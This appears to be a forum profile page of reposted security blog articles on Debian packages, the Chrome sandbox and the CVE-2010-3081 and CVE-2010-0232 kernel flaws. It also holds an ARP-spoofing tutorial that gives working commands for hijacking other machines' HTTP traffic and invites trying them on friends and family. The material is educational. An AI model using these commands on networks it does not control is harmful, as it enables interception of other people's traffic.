Jump to content

Nytro

Administrators
  • Posts

    18748
  • Joined

  • Last visited

  • Days Won

    719

Everything posted by Nytro

  1. [h=3]Anatomy of a Debian package[/h][h=4]By Ksplice Post Importer on Oct 06, 2010[/h]Ever wondered what a .deb file actually is? How is it put together, and what's inside it, besides the data that is installed to your system when you install the package? Today we're going to break out our sysadmin's toolbox and find out. (While we could just turn to deb(5), that would ruin the fun.) You'll need a Debian-based system to play along. Ubuntu and other derivatives should work just fine. [h=3]Finding a file to look at[/h] Whenever APT downloads a package to install, it saves it in a package cache, located in /var/cache/apt/archives/. We can poke around in this directory to find a package to look at. spang@sencha:~> cd /var/cache/apt/archives spang@sencha:/var/cache/apt/archives> spang@sencha:/var/cache/apt/archives> ls apache2-utils_2.2.16-2_amd64.deb app-install-data_2010.08.21_all.deb apt_0.8.0_amd64.deb apt_0.8.5_amd64.deb aptitude_0.6.3-3.1_amd64.deb ... nano, the text editor, ought to be a simple package. Let's take a look at that one. spang@sencha:/var/cache/apt/archives> cp nano_2.2.5-1_amd64.deb ~/tmp/blog spang@sencha:/var/cache/apt/archives> cd ~/tmp/blogapt debian dpkg package-management [h=3]Digging in[/h] Let's see what we can figure out about this file. The file command is a nifty tool that tries to figure out what kind of data a file contains. spang@sencha:~/tmp/blog> file --raw --keep-going nano_2.2.5-1_amd64.deb nano_2.2.5-1_amd64.deb: Debian binary package (format 2.0) - current ar archive - archive file Hmm, so file, which identifies filetypes by performing tests on them (rather than by looking at the file extension or something else cosmetic), must have a special test that identifies Debian packages. Since we passed the command the --keep-going option, though, it continued on to find other tests that match against the file, which is useful because these later matches are less specific, and in our case they tell us what a "Debian binary package" actually is under the hood—an "ar" archive! [h=3]Aside: a little bit of history[/h] Back in the day, in 1995 and before, Debian packages used to use their own ad-hoc archive format. These days, you can find that old format documented in deb-old(5). The new format was added to be "saner and more extensible" than the original. You can still find binaries in the old format on archive.debian.org. You'll see that file tells us that these debs are different; it doesn't know how to identify them in a more specific way than "a bunch of bits": spang@sencha:~/tmp/blog> file --raw --keep-going adduser-1.94-1.deb adduser-1.94-1.deb: data Now we can crack open the deb using the ar utility to see what's inside. [h=3]Inside the box[/h] ar takes an operation code and modifier flags and the archive to act upon as its arguments. The x operation tells it to extract files, and the v modifier tells it to be verbose. spang@sencha:~/tmp/blog> ar vx nano_2.2.5-1_amd64.deb x - debian-binary x - control.tar.gz x - data.tar.gz So, we have three files. [h=4]debian-binary[/h] spang@sencha:~/tmp/blog> cat debian-binary 2.0 This is just the version number of the binary package format being used, so tools know what they're dealing with and can modify their behaviour accordingly. One of file's tests uses the string in this file to add the package format to its output, as we saw earlier. [h=4]control.tar.gz[/h] spang@sencha:~/tmp/blog> tar xzvf control.tar.gz ./ ./postinst ./control ./conffiles ./prerm ./postrm ./preinst ./md5sums These control files are used by the tools that work with the package and install it to the system—mostly dpkg. [h=5]control[/h] spang@sencha:~/tmp/blog> cat control Package: nano Version: 2.2.5-1 Architecture: amd64 Maintainer: Jordi Mallach Installed-Size: 1824 Depends: libc6 (>= 2.3.4), libncursesw5 (>= 5.7+20100313), dpkg (>= 1.15.4) | install-info Suggests: spell Conflicts: pico Breaks: alpine-pico (<= 2.00+dfsg-5) Replaces: pico Provides: editor Section: editors Priority: important Homepage: http://www.nano-editor.org/ Description: small, friendly text editor inspired by Pico GNU nano is an easy-to-use text editor originally designed as a replacement for Pico, the ncurses-based editor from the non-free mailer package Pine (itself now available under the Apache License as Alpine). . However, nano also implements many features missing in pico, including: - feature toggles; - interactive search and replace (with regular expression support); - go to line (and column) command; - auto-indentation and color syntax-highlighting; - filename tab-completion and support for multiple buffers; - full internationalization support. This file contains a lot of important metadata about the package. In this case, we have: its name its version number binary-specific information: which architecture it was built for, and how many bytes it takes up after it is installed its relationship to other packages (on the Depends, Suggests, Conflicts, Breaks, and Replaces lines) the person who is responsible for this package in Debian (the "maintainer") How the package is categorized in Debian as a whole: nano is in the "editors" section. A complete list of archive sections can be found here. A "priority" rating. "Important" means that the package "should be found on any Unix-like system". You'd be hard-pressed to find a Debian system without nano. a homepage a description which should provide enough information for an interested user to figure out whether or not she wants to install the package One line that takes a bit more explanation is the "Provides:" line. This means that nano, when installed, will not only count as having the nano package installed, but also as the editor package, which doesn't really exist—it is only provided by other packages. This way other packages which need a text editor can depend on "editor" and not have to worry about the fact that there are many different sufficient choices available. You can get most of this same information for installed packages and packages from your configured package repositories using the command aptitude show <packagename>, or dpkg --status <packagename> if the package is installed. [h=5]postinst, prerm, postrm, preinst[/h] These files are maintainer scripts. If you take a look at one, you'll see that it's just a shell script that is run at some point during the [un]installation process. spang@sencha:~/tmp/blog> cat preinst #!/bin/sh set -e if [ "$1" = "upgrade" ]; then if dpkg --compare-versions "$2" lt 1.2.4-2; then if [ ! -e /usr/man ]; then ln -s /usr/share/man /usr/man update-alternatives --remove editor /usr/bin/nano || RET=$? rm /usr/man if [ -n "$RET" ]; then exit $RET fi else update-alternatives --remove editor /usr/bin/nano fi fi fi More on the nitty-gritty of maintainer scripts can be found here. [h=5]conffiles[/h] spang@sencha:~/tmp/blog> cat conffiles /etc/nanorc Any configuration files for the package, generally found in /etc, are listed here, so that dpkg knows when to not blindly overwrite any local configuration changes you've made when upgrading the package. [h=5]md5sums[/h] This file contains checksums of each of the data files in the package so dpkg can make sure they weren't corrupted or tampered with. [h=4]data.tar.gz[/h] Here are the actual data files that will be added to your system's / when the package is installed. spang@sencha:~/tmp/blog> tar xzvf data.tar.gz ./ ./bin/ ./bin/nano ./usr/ ./usr/bin/ ./usr/share/ ./usr/share/doc/ ./usr/share/doc/nano/ ./usr/share/doc/nano/examples/ ./usr/share/doc/nano/examples/nanorc.sample.gz ./usr/share/doc/nano/THANKS ./usr/share/doc/nano/changelog.gz ./usr/share/doc/nano/BUGS.gz ./usr/share/doc/nano/TODO.gz ./usr/share/doc/nano/NEWS.gz ./usr/share/doc/nano/changelog.Debian.gz [...] ./etc/ ./etc/nanorc ./bin/rnano ./usr/bin/nano [h=3]Finishing up[/h] That's it! That's all there is inside a Debian package. Of course, no one building a package for Debian-based systems would do the reverse of what we just did, using raw tools like ar, tar, and gzip. Debian packages use a make-based build system, and learning how to build them using all the tools that have been developed for this purpose is a topic for another time. If you're interested, the new maintainer's guide is a decent place to start. And next time, if you need to take a look inside a .deb again, use the dpkg-deb utility: spang@sencha:~/tmp/blog> dpkg-deb --extract nano_2.2.5-1_amd64.deb datafiles spang@sencha:~/tmp/blog> dpkg-deb --control nano_2.2.5-1_amd64.deb controlfiles spang@sencha:~/tmp/blog> dpkg-deb --info nano_2.2.5-1_amd64.deb new debian package, version 2.0. size 566450 bytes: control archive= 3569 bytes. 12 bytes, 1 lines conffiles 1010 bytes, 26 lines control 5313 bytes, 80 lines md5sums 582 bytes, 19 lines * postinst #!/bin/sh 160 bytes, 5 lines * postrm #!/bin/sh 379 bytes, 20 lines * preinst #!/bin/sh 153 bytes, 10 lines * prerm #!/bin/sh Package: nano Version: 2.2.5-1 Architecture: amd64 Maintainer: Jordi Mallach Installed-Size: 1824 Depends: libc6 (>= 2.3.4), libncursesw5 (>= 5.7+20100313), dpkg (>= 1.15.4) | install-info Suggests: spell Conflicts: pico Breaks: alpine-pico (<= 2.00+dfsg-5) Replaces: pico Provides: editor Section: editors Priority: important Homepage: http://www.nano-editor.org/ Description: small, friendly text editor inspired by Pico GNU nano is an easy-to-use text editor originally designed as a replacement for Pico, the ncurses-based editor from the non-free mailer package Pine (itself now available under the Apache License as Alpine). . However, nano also implements many features missing in pico, including: - feature toggles; - interactive search and replace (with regular expression support); - go to line (and column) command; - auto-indentation and color syntax-highlighting;apt debian dpkg package-management - filename tab-completion and support for multiple buffers; - full internationalization support. If the package format ever changes again, dpkg-deb will too, and you won't even need to notice. ~spang Sursa: https://blogs.oracle.com/ksplice/entry/anatomy_of_a_debian_package
  2. Stiu partea de vBulletin, trebuie sa vad care-i faza cu comment-urile pe Wordpress.
  3. Hijacking HTTP traffic on your home subnet using ARP and iptables By Ksplice Post Importer on Sep 29, 2010 Let's talk about how to hijack HTTP traffic on your home subnet using ARP and iptables. It's an easy and fun way to harass your friends, family, or flatmates while exploring the networking protocols. Please don't experiment with this outside of a subnet under your control -- it's against the law and it might be hard to get things back to their normal state. The setup Significant other comes home from work. SO pulls out laptop and tries to catch up on social media like every night. SO instead sees awesome personalized web page proposing marriage: How do we accomplish this? The key player is ARP, the "Address Resolution Protocol" responsible for associating Internet Layer addresses with Link Layer addresses. This usually means determining the MAC address corresponding to a given IP address. ARP comes into play when you, for example, head over to a friend's house, pull out your laptop, and try to use the wireless to surf the web. One of the first things that probably needs to happen is determining the MAC address of the gateway (probably your friend's router), so that the Ethernet packets containing all those IP[TCP[HTTP]] requests you want to send out to the Internet know how to get to their first hop, the gateway. Your laptop finds out the MAC address of the gateway by asking. It broadcasts an ARP request for "Who has IP address 192.168.1.1", and the gateway broadcasts an ARP response saying "I have 192.168.1.1, and my MAC address is xx:xx:xx:xx:xx:xx". Your laptop, armed with the MAC address of the gateway, can then craft Ethernet packets that will go to the gateway and get routed out to the Internet. But the gateway didn't really have to prove who it was. It just asserted who it was, and everyone listened. Anyone else can send an ARP response claiming to have IP address 192.168.1.1. And that's the ticket: if you can pretend to be the gateway, you can control all the packets that get routed through the gateway and the content returned to clients. Step 1: The layout I did this at home. The three machines involved were: real gateway router: IP address 192.168.1.1, MAC address 68:7f:74:9a:f4:ca fake gateway: a desktop called kid-charlemagne, IP address 192.168.1.200, MAC address 00:30:1b:47:f2:74 test machine getting duped: a laptop on wireless called pixeleen, IP address 192.168.1.111, MAC address 00:23:6c:8f:3f:95 The gateway router, like most modern routers, is bridging between the wireless and wired domains, so ARP packets get broadcast to both domains. Step 2: Enable IPv4 forwarding kid-charlemagne wants to be receiving packets that aren't destined for it (eg the web traffic). Unless IP forwarding is enabled, the networking subsystem is going to ignore packets that aren't destined for us. So step 1 is to enable IP forwarding. All that takes is a non-zero value in /proc/sys/net/ipv4/ip_forward: root@kid-charlemagne:~# echo 1 > /proc/sys/net/ipv4/ip_forward Step 3: Set routing rules so packets going through the gateway get routed to you kid-charlemagne is going to act like a little NAT. For HTTP packets heading out to the Internet, kid-charlemagne is going to rewrite the destination address in the IP packet headers to be its own IP address, so it becomes final destination for the web traffic: For HTTP packets heading back from kid-charlemagne to the client, it'll rewrite the source address to be that of the original destination out on the Internet. We can set up this routing rule with the following iptables command: jesstess@kid-charlemagne:~$ sudo iptables -t nat -A PREROUTING \ > -p tcp --dport 80 -j NETMAP --to 192.168.1.200 The iptables command has 3 components: When to apply a rule (-A PREROUTING) What packets get that rule (-p tcp --dport 80) The actual rule (-t nat ... -j NETMAP --to 192.168.1.200) When -t says we're specifying a table. The nat table is where a lookup happens on packets that create new connections. The nat table comes with 3 built-in chains: PREROUTING, OUTPUT, and POSTROUTING. We want to add a rule in the PREROUTING chain, which will alter packets right as they come in, before routing rules have been applied. What packets That PREROUTING rule is going to apply to TCP packets destined for port 80 (-p tcp --dport 80), aka HTTP traffic. For packets that match this filter, jump (-j) to the following action: The rule If we receive a packet heading for some destination, rewrite the destination in the IP header to be 192.168.1.200 (NETMAP --to 192.168.1.200). Have the nat table keep a mapping between the original destination and rewritten destination. When a packet is returning through us to its source, rewrite the source in the IP header to be the original destination. In summary: "If you're a TCP packet destined for port 80 (HTTP traffic), actually make my address, 192.168.1.200, the destination, NATting both ways so this is transparent to the source." One last thing: The networking subsystem will not allow you to ARP for a random IP address on an interface -- it has to be an IP address actually assigned to that interface, or you'll get a bind error along the lines of "Cannot assign requested address". We can handle this by adding an ip entry on the interface that is going to send packets to pixeleen, the test client. kid-charlemagne is wired, so it'll be eth0. jesstess@kid-charlemagne:~$ sudo ip addr add 192.168.1.1/24 dev eth0 We can check our work by listing all our interfaces' addresses and noting that we now have two IP addresses for eth0, the original IP address 192.168.1.200, and the gateway address 192.168.1.1. jesstess@kid-charlemagne:~$ ip addr ... 3: eth0: mtu 1500 qdisc noqueue state UNKNOWN link/ether 00:30:1b:47:f2:74 brd ff:ff:ff:ff:ff:ff inet 192.168.1.200/24 brd 192.168.1.255 scope global eth0 inet 192.168.1.1/24 scope global secondary eth0 inet6 fe80::230:1bff:fe47:f274/64 scope link valid_lft forever preferred_lft forever ... Step 4: Set yourself up to respond to HTTP requests kid-charlemagne happens to have Apache set up. You could run any minimalist web server that would, given a request for an arbitrary resource, do something interesting. Step 5: Test pretending to be the gateway At this point, kid-charlemagne is ready to pretend to be the gateway. The trouble is convincing pixeleen that the MAC address for the gateway has changed, to that of kid-charlemagne. We can do this by sending a Gratuitous ARP, which is basically a packet that says "I know nobody asked, but I have the MAC address for 192.168.1.1”. Machines that hear that Gratuitous ARP will replace an existing mapping from 192.168.1.1 to a MAC address in their ARP caches with the mapping advertised in that Gratuitous ARP. We can look at the ARP cache on pixeleen before and after sending the Gratuitous ARP to verify that the Gratuitious ARP is working. pixeleen’s ARP cache before the Gratuitous ARP: jesstess@pixleen$ arp -a ? (192.168.1.1) at 68:7f:74:9a:f4:ca on en1 ifscope [ethernet] ? (192.168.1.200) at 0:30:1b:47:f2:74 on en1 ifscope [ethernet] 68:7f:74:9a:f4:ca is the MAC address of the real gateway router. There are lots of command line utilities and bindings in various programming language that make it easy to issue ARP packets. I used the arping tool: jesstess@kid-charlemagne:~$ sudo arping -c 3 -A -I eth0 192.168.1.1 We'll send a Gratuitous ARP reply (-A), three times (-c -3), on the eth0 interface (-l eth0) for IP address 192.168.1.1. As soon as we generate the Gratuitous ARPs, if we check pixeleen’s ARP cache: jesstess@pixeleen$ arp -a ? (192.168.1.1) at 0:30:1b:47:f2:74 on en1 ifscope [ethernet] ? (192.168.1.200) at 0:30:1b:47:f2:74 on en1 ifscope [ethernet] Bam. pixeleen now thinks the MAC address for IP address 192.169.1.1 is 0:30:1b:47:f2:74, which is kid-charlemagne’s address. If I try to browse the web on pixeleen, I am served the resource matching the rules in kid-charlemagne’s web server. We can watch this whole exchange in Wireshark: First, the Gratuitous ARPs generated by kid-charlemagne: The only traffic getting its headers rewritten so that kid-charlemagne is the destination is HTTP traffic: TCP traffic on port 80. That means all of the non-HTTP traffic associated with viewing a web page still happens as normal. In particular, when kid-charlemagne gets the DNS resolution requests for lycos.com, the test site I visited, it will follow its routing rules and forward them to the real router, which will send them out to the Internet: The HTTP traffic gets served by kid-charlemagne: Note that the HTTP request has a source IP of 192.168.1.111, pixeleen, and a destination IP of 209.202.254.14, which dig -x 209.202.254.14 +short tells us is search-core1.bo3.lycos.com. The HTTP response has a source IP of 209.202.254.14 and a destination IP of 192.168.1.111. The fact that kid-charlemagne has rerouted and served the request is totally transparent to the client at the IP layer. Step 6: Deploy against friends and family I trust you to get creative with this. Step 7: Reset everything to the normal state To get the normal gateway back in control, delete the IP address from the interface on kid-charlemagne and delete the iptables routing rule: jesstess@kid-charlemagne:~$ sudo ip addr delete 192.168.1.1/24 dev eth0 jesstess@kid-charlemagne:~$ sudo iptables -t nat -D PREROUTING -p tcp --dport 80 -j NETMAP --to 192.168.1.200 To get the client machines to believe the router is the real gateway, you might have to clear the gateway entry from the ARP cache with arp -d 192.168.1.1, or bring your interfaces down and back up. I can verify that my TiVo corrected itself quickly without any intervention, but I won't make any promises about your networked devices. In summary That was a lot of explanatory text, but the steps required to hijack the HTTP traffic on your home subnet can be boiled down to: enabled IP forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward set your routing rule: iptables -t nat -A PREROUTING -p tcp --dport 80 -j NETMAP --to 192.168.1.200 add the gateway IP address to the appropriate interface: ip addr add 192.168.1.1/24 dev eth0 ARP for the gateway MAC address: arping -c 3 -A -I eth0 192.168.1.1 substituting the appropriate IP address and interface information and tearing down when you're done. And that's all there is to it! This has been tested as working in a few environments, but it might not work in yours. I'd love to hear the details on if this works, works with modifications, or doesn't work (because the devices are being too clever about Gratuitous ARPs, or otherwise) in the comments. --> Huge thank-you to fellow experimenter adamf. <--- ~jesstess Sursa: https://blogs.oracle.com/ksplice/entry/hijacking_http_traffic_on_your
  4. [h=3]Anatomy of an exploit: CVE-2010-3081[/h][h=4]By Ksplice Post Importer on Sep 22, 2010[/h]It has been an exciting week for most people running 64-bit Linux systems. Shortly after "Ac1dB1tch3z" released his or her exploit of the vulnerability known as CVE-2010-3081, we saw this exploit aggressively compromising machines, with reports of compromises all over the hosting industry and many machines using our diagnostic tool and testing positive for the backdoors left by the exploit. The talk around the exploit has mostly been panic and mitigation, though, so now that people have had time to patch their machines and triage their compromised systems, what I'd like to do for you today is talk about how this bug worked, how the exploit worked, and what we can learn about Linux security. [h=3]The Ingredients of an Exploit[/h] There are three basic ingredients that typically go into a kernel exploit: the bug, the target, and the payload. The exploit triggers the bug -- a flaw in the kernel -- to write evil data corrupting the target, which is some kernel data structure. Then it prods the kernel to look at that evil data and follow it to run the payload, a snippet of code that gives the exploit the run of the system. The bug is the one ingredient that is unique to a particular vulnerability. The target and the payload may be reused by an attacker in exploits for other vulnerabilities -- if 'Ac1dB1tch3z' didn't copy them already from an earlier exploit, by himself or by someone else, he or she will probably reuse them in future exploits. Let's look at each of these in more detail. [h=3]The Bug: CVE-2010-3081[/h] An exploit starts with a bug, or vulnerability, some kernel flaw that allows a malicious user to make a mess -- to write onto its target in the kernel. This bug is called CVE-2010-3081, and it allows a user to write a handful of words into memory almost anywhere in the kernel. The bug was present in Linux's 'compat' subsystem, which is used on 64-bit systems to maintain compatibility with 32-bit binaries by providing all the system calls in 32-bit form. Now Linux has over 300 different system calls, so this was a big job. The Linux developers made certain choices in order to keep the task manageable: We don't want to rewrite the code that actually does the work of each system call, so instead we have a little wrapper function for compat mode. The wrapper function needs to take arguments from userspace in 32-bit form, then put them in 64-bit form to pass to the code that does the system call's work. Often some arguments are structs which are laid out differently in the 32-bit and 64-bit worlds, so we have to make a new 64-bit struct based on the user's 32-bit struct. The code that does the work expects to find the struct in the user's address space, so we have to put ours there. Where in userspace can we find space without stepping on toes? The compat subsystem provides a function to find it on the user's stack. Now, here's the core problem. That allocation routine went like this: static inline void __user *compat_alloc_user_space(long len) { struct pt_regs *regs = task_pt_regs(current); return (void __user *)regs->sp - len; } The way you use it looks a lot like the old familiar malloc(), or the kernel's kmalloc(), or any number of other memory-allocation routines: you pass in the number of bytes you need, and it returns a pointer where you are supposed to read and write that many bytes to your heart's content. But it comes -- came -- with a special catch, and it's a big one: before you used that memory, you had to check that it was actually OK for the user to use that memory, with the kernel's access_ok() function. If you've ever helped maintain a large piece of software, you know it's inevitable that someone will eventually be fooled by the analogy, miss the incongruence, and forget that check. Fortunately the kernel developers are smart and careful people, and they defied that inevitability almost everywhere. Unfortunately, they missed it in at least two places. One of those is this bug. If we call getsockopt() in 32-bit fashion on the socket that represents a network connection over IP, and pass an optname of MCAST_MSFILTER, then in a 64-bit kernel we end up in compat_mc_getsockopt(): int compat_mc_getsockopt(struct sock *sock, int level, int optname, char __user *optval, int __user *optlen, int (*getsockopt)(struct sock *,int,int,char __user *,int __user *)) { This function calls compat_alloc_user_space(), and it fails to check the result is OK for the user to access -- and by happenstance the struct it's making room for has a variable length, supplied by the user. So the attacker's strategy goes like so: Make an IP socket in a 32-bit process, and call getsockopt() on it with optname MCAST_MSFILTER. Pass in a giant length value, almost the full possible 2GB. Because compat_alloc_user_space() finds space by just subtracting the length from the user's stack pointer, with a giant length the address wraps around, down past zero, to where the kernel lives at the top of the address space. When the bug fires, the kernel will copy the original struct, which the attacker provides, into the space it has just 'allocated', starting at that address up in kernel-land. So fill that struct with, say, an address for evil code. Tune the length value so that the address where the 'new struct' lives is a particularly interesting object in the kernel, a target. The fix for CVE-2010-3081 was to make compat_alloc_user_space() call access_ok() to check for itself. More technical details are ably explained in the original report by security researcher Ben Hawkes, who brought the vulnerability to light. [h=3]The Target: Function Pointers Everywhere[/h] The target is some place in the kernel where if we make the right mess, we can leverage that into the kernel running the attacker's code, the payload. Now the kernel is full of function pointers, because secretly it's object oriented. So for example the attacker may poke some userspace object like a special file to cause the kernel to invoke a certain method on it -- and before doing so will target that method's function pointer in the object's virtual method table (called an "ops struct" in kernel lingo) which says where to find all the methods, scribbling over it with the address of the payload. A key constraint for the attacker is to pick something that will never be used in normal operation, so that nothing goes awry to catch the user's attention. This exploit uses one of three targets: the interrupt descriptor table, timer_list_fops, and the LSM subsystem. The interrupt descriptor table (IDT) is morally a big table of function pointers. When an interrupt happens, the hardware looks it up in the IDT, which the kernel has set up in advance, and calls the handler function it finds there. It's more complicated than that because each entry in the table also needs some metadata to say who's allowed to invoke the interrupt, whether the handler should be called with user or kernel privileges, etc. This exploit picks interrupt number 221, higher than anybody normally uses, and carefully sets up that entry in the IDT so that its own evil code is the handler and runs in kernel mode. Then with the single instruction int $221, it makes that interrupt happen. timer_list_fops is the "ops struct" or virtual method table for a special file called /proc/timer_list. Like many other special files that make up the proc filesystem, /proc/timer_list exists to provide kernel information to userspace. This exploit scribbles on the pointer for the poll method, which is normally not even provided for this file (so it inherits a generic behavior), and which nobody ever uses. Then it just opens that file and calls poll(). I believe this could just as well have been almost any file in /proc/. The LSM approach attacks several different ops structs of type security_operations, the tables of methods for different 'Linux security modules'. These are gigantic structs with hundreds of function pointers; the one the exploit targets in each struct is msg_queue_msgctl, the 100th one. Then it issues a msgctl system call, which causes the kernel to check whether it's authorized by calling the msg_queue_msgctl method... which is now the exploit's code. Why three different targets? One is enough, right? The answer is flexibility. Some kernels don't have timer_list_fops. Some kernels have it, but don't make available a symbol to find its address, and the address will vary from kernel to kernel, so it's tricky to find. Other kernels pose the same obstacle with the security_operations structs, or use a different security_operations than the ones the exploit corrupts. Different kernels offer different targets, so a widely applicable exploit has to have several targets in its repertoire. This one picks and chooses which one to use depending on what it can find. [h=3]The Payload: Steal Privileges[/h] Finally, once the bug is used to corrupt the target and the target is triggered, the kernel runs the attacker's payload, or shellcode. A simple exploit will run the bare minimum of code inside the kernel, because it's much easier to write code that can run in userspace than in kernelspace -- so it just sets the process up to have the run of the system, and then returns. This means setting the process's user ID to 0, root, so that everything else it does is with root privileges. A process's user ID is stored in different places in different kernel versions -- the system became more complicated in 2.6.29, and again in 2.6.30 -- so the exploit needs to have flexibility again. This one checks the version with uname and assembles the payload accordingly. This exploit can also clear a couple of flags to turn off SELinux, with code it optionally includes in the payload -- more flexibility. Then it lets the kernel return to userspace, and starts a root shell. In a real attack, that root shell might be used to replace key system binaries, steal data, start a botnet daemon, or install backdoors on disk to cement the attacker's control and hide their presence. [h=3]Flexibility, or, You Can't Trust a Failing Exploit[/h] All the points of flexibility in this exploit illustrate a key lesson: you can't determine you're vulnerable just because an exploit fails. For example, on a Fedora 13 system, this exploit errors out with a message like this: $ ./ABftw Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y $$$ Kallsyms +r $$$ K3rn3l r3l3as3: 2.6.34.6-54.fc13.i686 [...] !!! Err0r 1n s3tt1ng cr3d sh3llc0d3z Sometimes a system administrator sees an exploit fail like that and concludes they're safe. "Oh, Red Hat / Debian / my vendor says I'm vulnerable", they may say. "But the exploit doesn't work, so they're just making stuff up, right?" Unfortunately, this can be a fatal mistake. In fact, the machine above is vulnerable. The error message only comes about because the exploit can't find the symbol per_cpu__current_task, whose value it needs in the payload; it's the address at which to find the kernel's main per-process data structure, the task_struct. But a skilled attacker can find the task_struct without that symbol, by following pointers from other known data structures in the kernel. In general, there is almost infinitely much work an exploit writer could put in to make the exploit function on more and more kernels. Use a wider repertoire of targets; find missing symbols by following pointers or by pattern-matching in the kernel; find missing symbols by brute force, with a table prepared in advance; disable SELinux, as this exploit does, or grsecurity; or add special code to navigate the data structures of unusual kernels like OpenVZ. If the bug is there in a kernel but the exploit breaks, it's only a matter of work or more work to extend the exploit to function there too. That's why the only way to know that a given kernel is not affected by a vulnerability is a careful examination of the bug against the kernel's source code and configuration, and never to rely on a failing exploit -- and even that examination can sometimes be mistakenly optimistic. In practice, for a busy system administrator this means that when the vendor recommends you update, the only safe choice is to update. ~price Sursa: https://blogs.oracle.com/ksplice/entry/anatomy_of_an_exploit_cve
  5. [h=3]Introducing Chrome's next-generation Linux sandbox[/h]Thursday, September 6, 2012 Starting with Chrome 23.0.1255.0, recently released to the Dev Channel, you will see Chrome making use of our next-generation sandbox on Linux and ChromeOS for renderers. We are using a new facility, introduced in Linux 3.5 and developed by Will Drewry called Seccomp-BPF. Seccomp-BPF builds on the ability to send small BPF (for BSD Packet Filter) programs that can be interpreted by the kernel. This feature was originally designed for tcpdump, so that filters could directly run in the kernel for performance reasons. BPF programs are untrusted by the kernel, so they are limited in a number of ways. Most notably, they can't have loops, which bounds their execution time by a monotonic function of their size and allows the kernel to know they will always terminate. With Seccomp-BPF, BPF programs can now be used to evaluate system call numbers and their parameters. This is a huge change for sandboxing code in Linux, which, as you may recall, has been very limited in this area. It's also a change that recognizes and innovates in two important dimensions of sandboxing: Mandatory access control versus "discretionary privilege dropping". Something I always felt strongly about and have discussed before. Access control semantics, versus attack surface reduction. Let's talk about the second topic. Having a nice, high level, access control semantics is appealing and, one may argue, necessary. When you're designing a sandbox for your application, you may want to say things such as: I want this process to have access to this subset of the file system. I want this process to be able to allocate or de-allocate memory. I want this process to be able to interfere (debug, send signals) with this set of processes. The capabilities-oriented framework Capsicum takes such an approach. This is very useful. However, with such an approach it's difficult to assess the kernel's attack surface. When the whole kernel is in your trusted computing base "you're going to have a bad time", as a colleague recently put it. Now, in that same dimension, at the other end of the spectrum, is the "attack surface reduction" oriented approach. The approach where you're close to the ugly guts of implementation details, the one taken by Seccomp-BPF. In that approach, read()+write() and vmsplice() are completely different beasts, because you're not looking at their semantics, but at the attack surface they open in the kernel. They perform similar things, but perhaps ihaquer will have a harder time exploiting read()/write() on pipes than vmsplice(). Semantically, uselib() seems to be a subset of open() + mmap(), but similarly, the attack surface is different. The drawback of course is that implementing particular sandbox semantics with such a mechanism looks ugly. For instance, let's say you want to allow opening any file in /public from within the sandbox, how would you implement that in seccomp-BPF? Well, first you need to understand what set of system calls would be concerned by such an operation. That's not just open(), but also openat() (an ugly implementation-level detail, some libc will happily use openat() with AT_FDCWD instead of open(). Then you realize that a BPF program in the kernel will only see a pointer to the file name, so you can't filter on that (even if you could dereference pointers in BPF programs, it wouldn't be safe to do so, because an attacker could create another thread that would modify the file name after it was evaluated by the BPF program, so the kernel would also need to copy it in a safe location). In the end, what you need to do is have a trusted helper process (or broker) that runs unsandboxed for this particular set of system calls and have it accept requests to open files over an IPC channel, have it make the security decision and send the file descriptor back over an IPC. (If you're interested in that sort of approach, pushed to the extreme, look at Markus Gutschke's original seccomp mode 1 sandbox.) That's tedious but doable. In comparison, Capsicum would make this a breeze. There are other issues with such a low-level approach. By filtering system calls, you're breaking the kernel API. This means that third party code (such as libraries) you include in your address space can break. For this reason, I suggested to Will to implement an "exception" mechanism through signals, so that special handlers can be called when system calls are denied. Such handlers are now used and can for instance "broker out" system calls such as open(). In my opinion, the Capsicum and Seccomp-BPF approach are trade-offs, each on the other end of the spectrum. Having both would be great. We could stack one on top of the other and have the best of both worlds. In a similar, but very limited, fashion, this is what we have now in Chrome: we stacked the seccomp-bpf sandbox on top of the setuid sandbox. The setuid sandbox gives a few easy to understand semantic properties: no file system access, no process access outside of the sandbox, no network access. It makes it much easier to layer a seccomp-bpf sandbox on top. Several people besides myself have worked on making this possible. In particular: Chris Evans, Jorge Lucangeli Obes, Markus Gutschke, Adam Langley (and others who made Chrome sandboxable under the setuid sandbox in the first place) and of course, for the actual kernel support, Will Drewry and Kees Cook. We will continue to work on improving and tightening this new sandbox, this is just a start. Please give it a try, and report any bugs to crbug.com (feel free to cc: jln at chromium.org directly). PS: to make sure that you have kernel support for seccomp BPF, use Linux 3.5 or Ubuntu 12.04. Check about:sandbox in Chrome 22+ and see if Seccomp-BPF is enabled). Also make sure you're using the 64 bits version of Chrome. Posted by Julien Tinnes at 5:21 PM Sursa: cr0 blog: Introducing Chrome's next-generation Linux sandbox
  6. [h=3]CVE-2010-0232: Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack[/h]Thursday, January 21, 2010 Two days ago, Tavis Ormandy has published one of the most interesting vulnerabilities I've seen so far. It's one of those rare, but fascinating design-level errors dealing with low-level system internals. Its exploitation requires skills and ingenuity. The vulnerability lies in Windows' support for Intel's hardware 8086 emulation support (virtual-8086, or VM86) and is believed to have been there since Windows NT 3.1 (1993!), making it 17 years old. It uses two tricks that we have already published on this blog before, the #GP on pre-commit handling failure and the forging of cs:eip in VM86 mode. This was intended to be mentioned in our talk at PacSec about virtualization this past November, but Tavis had agreed with Microsoft to postpone the release of this advisory. Tavis was kind enough to write a blog post about it, you can read it below: From Tavis Ormandy: I've just published one of the most interesting bugs I've ever encountered, a simple authentication check in Windows NT that can incorrectly let users take control of the system. The bug exists in code hidden deep enough inside the kernel that it's gone unnoticed for as long as NT has existed. If you've ever tried to run an MS-DOS or Win16 application on a modern NT machine, the chances are it worked. This is an impressive feat, these applications were written for a completely different execution environment and operating system, and yet still work today and run at almost native speed. The secret that makes this possible behind the scenes is Virtual-8086 mode. Virtual-8086 mode is a hardware emulation facility built into all x86 processors since the i386, and allows modern operating systems to run 16-bit programs designed for real mode with very little overhead. These 16-bit programs run in a simulated real mode environment within a regular protected mode task, allowing them to co-exist in a modern multitasking environment. Support for Virtual-8086 mode requires a monitor, the collective name for the software that handles any requests the program makes. These requests range from handling sensitive instructions to mapping low-level services onto system calls and are implemented partially in kernel mode and partially in user mode. In Windows NT, the user mode component is called the NTVDM subsystem, and it interacts with the kernel via a native system service called NtVdmControl. NtVdmControl is unusual because it's authenticated, only authorised programs are permitted to access it, which is enforced using a special process flag called VdmAllowed which the kernel verifies is present before NtVdmControl will perform any action; if you don't have this flag, the kernel will always return 